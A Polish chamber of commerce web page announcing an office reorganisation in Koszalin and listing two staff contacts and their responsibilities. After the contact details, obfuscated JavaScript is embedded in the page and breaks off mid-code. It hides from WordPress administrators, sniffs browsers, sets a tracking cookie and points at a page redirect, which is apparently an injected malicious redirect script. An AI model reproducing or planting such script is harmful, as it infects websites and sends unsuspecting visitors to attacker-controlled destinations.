Reorganizacja Biura Północnej Izby Gospodarczej w Koszalinie – zmieniamy się dla Was! | Północna Izba Gospodarcza w Koszalinie

W zawiązku z reorganizacją prac Biura Północnej Izby Gospodarczej w Koszalinie oraz intensyfikacją działań skupionych wokół Konkursu Pracodawca Roku, Herbatki Izbowej 2017 oraz promocji Państwa Firm, zachęcam do kontaktowania się z:

Panią Dominiką Wiśniewską w sprawach:

 • Koordynacji działań dotyczących konkursu Pracodawca Roku.
 • Promocji firm zrzeszonych w Północnej Izbie Gospodarczej:
  • udostępnianiem aktualnych ofert,
  • ciekawostek dotyczących Państwa firmy,
  • sukcesów z prowadzonej działalności.

Dane kontaktowe dw@izba.info oraz telefonicznie 733 837 300.

 

Panem Arkadiuszem Ługowskim w sprawach związanych z:

 • Funkcjonowaniem Biura Izby,
 • Działań sponsorskich Herbatki Izbowej 2017,
 • Rachunkami składek członkowskich,
 • W sprawach organizacyjnych Herbatki Izbowej.

Dane kontaktowe biuro.koszalin@izba.info oraz telefonicznie 537 184 630. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m